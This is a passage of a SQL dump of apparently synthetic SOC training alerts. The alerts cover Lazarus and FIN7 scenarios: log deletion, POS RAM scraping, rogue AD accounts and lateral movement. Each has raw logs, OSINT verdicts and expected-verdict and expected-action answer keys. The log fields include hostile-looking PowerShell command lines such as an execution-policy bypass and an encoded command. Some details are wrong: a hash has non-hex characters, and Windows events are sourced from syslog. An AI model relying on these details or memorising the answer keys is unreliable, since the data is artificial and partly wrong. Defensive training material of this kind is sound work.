2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.56\\\",\\\"proxy_chain\\\":[\\\"10.1.1.1\\\",\\\"172.16.0.5\\\",\\\"203.0.113.56\\\"],\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"executive_emails.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.196Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.56\\\",\\\"proxy_chain\\\":[\\\"10.1.1.1\\\",\\\"172.16.0.5\\\",\\\"203.0.113.56\\\"],\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"executive_emails.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.196Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.56\\\",\\\"proxy_chain\\\":[\\\"10.1.1.1\\\",\\\"172.16.0.5\\\",\\\"203.0.113.56\\\"],\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"executive_emails.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(569, 'Destruction of Evidence', 'medium', 'System Log Analysis', 'An attempt to delete system logs to erase traces of a cyberattack was detected. The action is suspected to be part of a cover-up strategy by the attackers to complicate forensic investigations.', 'Log Deletion', 'T1070.004 - Indicator Removal on Host: File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:45Z\",\"eventID\":\"4625\",\"log_name\":\"Security\",\"message\":\"A deletion event was detected on the system logs located at C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx.\",\"user\":\"malicious_actor\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.12\",\"deleted_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"process_name\":\"cmd.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Company internal IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"System Logs\",\"verdict\":\"suspicious\",\"details\":\"Critical system log file targeted for deletion.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Lazarus Group\'s malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'IR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.197Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:45Z\\\",\\\"eventID\\\":\\\"4625\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"A deletion event was detected on the system logs located at C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx.\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.12\\\",\\\"deleted_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process_name\\\":\\\"cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.197Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:45Z\\\",\\\"eventID\\\":\\\"4625\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"A deletion event was detected on the system logs located at C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx.\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.12\\\",\\\"deleted_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process_name\\\":\\\"cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.197Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:45Z\\\",\\\"eventID\\\":\\\"4625\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"A deletion event was detected on the system logs located at C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx.\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.12\\\",\\\"deleted_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process_name\\\":\\\"cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.197Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:45Z\\\",\\\"eventID\\\":\\\"4625\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"A deletion event was detected on the system logs located at C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx.\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.12\\\",\\\"deleted_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process_name\\\":\\\"cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.197Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:45Z\\\",\\\"eventID\\\":\\\"4625\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"A deletion event was detected on the system logs located at C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx.\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.12\\\",\\\"deleted_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process_name\\\":\\\"cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(570, 'Analysis of Geopolitical Motivations', 'high', 'Geopolitical Reports', 'This alert focuses on analyzing the geopolitical factors linking the recent cyber attack to North Korea\'s strategic goals and financial needs, specifically attributed to the Lazarus Group. The attack employed destructive malware and financial theft tactics.', 'Threat Intelligence Analysis', 'T1485: Data Destruction, T1589: Gather Victim Identity Information', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:35Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_hash\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"malware_name\":\"WannaCry\",\"attacker_domain\":\"malicious-nk-group.com\",\"user\":\"jdoe\",\"filename\":\"ransomware_payload.exe\",\"action\":\"Data exfiltration attempt detected\",\"indicators\":[{\"indicator_type\":\"ip\",\"value\":\"203.0.113.45\",\"role\":\"attacker\"},{\"indicator_type\":\"hash\",\"value\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"role\":\"malware\"}]}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address linked to North Korean threat actor group Lazarus\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with WannaCry ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used by ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.198Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"attacker_domain\\\":\\\"malicious-nk-group.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"action\\\":\\\"Data exfiltration attempt detected\\\",\\\"indicators\\\":[{\\\"indicator_type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"role\\\":\\\"attacker\\\"},{\\\"indicator_type\\\":\\\"hash\\\",\\\"value\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"role\\\":\\\"malware\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:31:22.198Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"attacker_domain\\\":\\\"malicious-nk-group.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"action\\\":\\\"Data exfiltration attempt detected\\\",\\\"indicators\\\":[{\\\"indicator_type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"role\\\":\\\"attacker\\\"},{\\\"indicator_type\\\":\\\"hash\\\",\\\"value\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"role\\\":\\\"malware\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:30:22.198Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"attacker_domain\\\":\\\"malicious-nk-group.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"action\\\":\\\"Data exfiltration attempt detected\\\",\\\"indicators\\\":[{\\\"indicator_type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"role\\\":\\\"attacker\\\"},{\\\"indicator_type\\\":\\\"hash\\\",\\\"value\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"role\\\":\\\"malware\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:29:22.198Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"attacker_domain\\\":\\\"malicious-nk-group.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"action\\\":\\\"Data exfiltration attempt detected\\\",\\\"indicators\\\":[{\\\"indicator_type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"role\\\":\\\"attacker\\\"},{\\\"indicator_type\\\":\\\"hash\\\",\\\"value\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"role\\\":\\\"malware\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:28:22.198Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"attacker_domain\\\":\\\"malicious-nk-group.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"action\\\":\\\"Data exfiltration attempt detected\\\",\\\"indicators\\\":[{\\\"indicator_type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"role\\\":\\\"attacker\\\"},{\\\"indicator_type\\\":\\\"hash\\\",\\\"value\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"role\\\":\\\"malware\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(571, 'Compromised HVAC Vendor Access', 'high', 'Firewall logs', 'FIN7 initiated an attack by exploiting a vulnerability in the HVAC vendor\'s network, providing an entry point into Target\'s infrastructure. The attack was detected through unusual traffic patterns in the firewall logs, originating from a known malicious IP associated with FIN7 operations.', 'Initial Access', 'T1199: Trusted Relationship', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"TCP\",\"action\":\"allowed\",\"username\":\"hvac_vendor\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"malicious_update.exe\",\"event_id\":\"FW-0002345678\",\"message\":\"Unusual traffic from trusted HVAC vendor IP\"}', '2026-01-08 22:01:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known FIN7 C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"HVAC vendor access point\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Identified as malware associated with FIN7\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Filename known to be used by FIN7\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"hvac_vendor\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"Recognized vendor account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(572, 'Deploying RAM-Scraping Malware', 'high', 'Endpoint detection and response (EDR) logs', 'The EDR system detected the deployment of a RAM-scraping malware on POS systems. The malware was installed to capture unencrypted credit card data during transactions. Indicators of compromise (IOCs) were identified, including a known malicious IP address and file hash associated with RAM-scraping activities.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"process_creation\",\"hostname\":\"POS-Server-01\",\"username\":\"admin\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -exec bypass -file C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\",\"file_hash\":\"3d2e1f99b8a4b3c2d5e6f7g8h9i0j1k2\",\"source_ip\":\"198.51.100.27\",\"destination_ip\":\"192.168.1.25\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\"}', '2026-01-08 22:01:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.27\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous RAM-scraping malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3d2e1f99b8a4b3c2d5e6f7g8h9i0j1k2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as RAM-scraping malware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File contains scripts for RAM-scraping operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(573, 'Establishing Persistence', 'medium', 'Active Directory logs', 'An unauthorized user account was created in the Active Directory to maintain persistent access to the network. The account creation was detected, indicating a potential persistence technique being employed by attackers.', 'Persistence', 'T1136: Create Account', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T10:15:30Z\",\"event_id\":\"4720\",\"event_source\":\"Security\",\"computer_name\":\"DC1.corporate.local\",\"user\":\"SYSTEM\",\"target_user\":{\"account_name\":\"unauthorized_admin\",\"account_domain\":\"corporate\",\"user_id\":\"S-1-5-21-1234567890-1234567890-1234567890-1001\"},\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.50\",\"logon_type\":\"3\",\"logon_process\":\"Advapi\",\"authentication_package\":\"Negotiate\"}', '2026-01-08 22:01:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"unauthorized_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized user account created to maintain persistence.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP is associated with known malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(574, 'Lateral Movement to Payment Network', 'high', 'Network traffic analysis', 'FIN7 has moved laterally within the network using compromised credentials to access the payment processing network. The movement was detected through unusual network activity and the presence of known malicious IP addresses and file hashes.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:27:45Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"credential_dump.exe\",\"event\":\"lateral movement detected\",\"description\":\"User jdoe moved laterally from 10.0.2.15 to 192.168.1.10 using stolen credentials, connecting from the external IP 203.0.113.45. Detected file hash e99a18c428cb38d5f260853678922e03 associated with known malware.\"}', '2026-01-08 22:01:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address used for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"suspicious\",\"details\":\"User credentials may have been compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by FIN7.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"credential_dump.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Filename associated with credential dumping tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
